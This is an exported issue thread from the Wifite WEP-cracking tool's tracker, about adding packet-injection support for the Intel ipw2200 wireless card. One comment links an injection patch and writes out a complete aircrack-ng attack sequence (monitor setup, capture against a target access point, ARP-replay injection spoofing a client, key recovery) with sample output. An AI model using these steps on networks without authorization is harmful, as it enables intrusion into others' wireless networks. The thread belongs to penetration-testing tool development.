Open GoogleCodeExporter opened 8 years ago
ipw2200 is different than other wireless cards. The "issue" you encountered is
not because of Wifite, but because of your hardware and drivers.
I have tried to add support for ipw2200 on GrimWepa and it was a huge waste of
my time. Backtrack4 does not work well with ipw2200. I am going to ask you
some questions now to save us both some time.
First (and biggest) question:
*Have you successfully injected packets and cracked a WEP key using the ipw2200
chipset on backtrack4 R1?*
If your answer is "no" or "I don't know" then wifite is not for you. Get
Backtrack2 and follow [http://forum.aircrack-ng.org/index.php?topic=1775.0 the
guide posted here]. Or you could buy one of the hundreds of other models of
wireless cards that are compatible with Backtrack 4. I will not help you any
further. Goodbye.
If your answer is "yes" then I need you to tell me *absolutely everything*
about the attack process. I want to know every command you type, and the
output for each command; no exceptions. Feel free to email this process to me:
"derv82 at gmail dot com" since emails are easier to write than comments.
Here's some questions to help guide your email:
Starting monitor mode:
1. How can you tell if you have the ipw2200 chipset? Does airmon-ng say
'ipw2200' or 'Intel 2200'? What is the name of the device (wlan0, rtap0)?
2. How do you put your device into monitor mode? Do you use airmon-ng,
iwconfig, or something else? Please tell me the exact commands issued.
3. What is the name of the device that is put into monitor mode (wlan1, mon0)?
What is the *entire* output for iwconfig after the device is in monitor mode?
4. Is there anything special you have to do before/after putting your card into
monitor mode? It would help if you posted *every command* that you type when
cracking WEP.
WEP attacks:
5. How do you fake-authenticate with the access point? Do you use "aireplay-ng
-1 ..." or "wpa_supplicant ..." ? What command do you use to fake-authenticate?
How do you know when you are associated with the access point?
6. What attacks work? I have heard that only "aireplay-ng -3 ..." (arp-request
replay) injects, and that the other WEP attacks fail. Is this true for your
card? Can you test injection using "aireplay-ng -9"? What does it say?
Clean-up:
7. Do you have to run any commands after the attack is complete? Do you put
your device out of monitor mode? Clean up at all?
Sorry for the block of text, but I refuse to type one line of code for ipw2200
support until I am certain that it works with Backtrack4.
If the workaround for ipw2200 is too complex or would break the flow of Wifite,
it will not be supported.
Original comment by der...@gmail.com
on 28 Sep 2010 at 6:39
Agreed: ipw2200 is a complete waste of time, too many people have played with
getting support working to end in frustration. Quicker and easier to just buy a
supported miniPCI/USB card...
Original comment by phillips321
on 1 Oct 2010 at 1:43
I had some time to waste and came up with the patch (sorry, I don't use
backtrack):
http://trac.pentoo.ch/browser/portage/trunk/net-wireless/compat-wireless/files/ipw2200-inject.2.6.36.patch
Below are the basic steps on how to use it:
modprobe ipw2200 rtap_iface=1
iwconfig eth1 essid TestWiFi channel 6 key s:fakekey mode managed
ifconfig eth1 up hw ether 00:11:22:33:44:55
ifconfig rtap0 up
airodump-ng eth1
- syslog: kernel: device rtap0 entered promiscuous mode
airodump-ng eth1 --channel 6 --bssid 00:01:MACofAP -w dumpfile
- find WAP protected access point and write down MAC address (MACofAP)
- notice MAC address of connected client (MACofCLIENT)
aireplay-ng --arpreplay -b 00:01:MACofAP -h 00:02:MACofCLIENT eth1
aircrack-ng -z -b 00:01:MACofAP dumpfile*.cap
- Opening dumpfile-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 15298 ivs.
KEY FOUND! [ xxxxxx ]
Decrypted correctly: 100%
Feel free to test it and add to wifite.
ps. wifite can be found in pentoo trac too.
Original comment by blshkv
on 13 Dec 2010 at 7:08
Great!
How can I test it? Do I have to download/install the patch, or something else? A newer
release of wifite?
thank you in advance
Original comment by marco.ca...@gmail.com
on 13 Dec 2010 at 10:03
You need to patch/recompile/reload the ipw2200 kernel module, play around with
aircrack-ng as above (the arpreplay method). You are welcome to test other
methods (see aircrack-ng docs for details) and provide a full answer to
comment #2.
Let's hope it will convince developers to support ipw2200 card in the next
release.
Original comment by blshkv
on 13 Dec 2010 at 10:42
"You need to patch/recompile/reload the ipw2200 kernel module": ok. But how?
Sorry for the stupid question... perhaps it's a goal out of my reach...
thanks again
Original comment by marco.ca...@gmail.com
on 13 Dec 2010 at 11:06
https://code.google.com/p/pentoo/source/browse/portage/trunk/net-wireless/compat-wireless/files/ipw2200-inject.3.4.6.patch
Original comment by blshkv
on 15 Aug 2012 at 10:17
Original issue reported on code.google.com by
marco.ca...@gmail.com
on 27 Sep 2010 at 11:32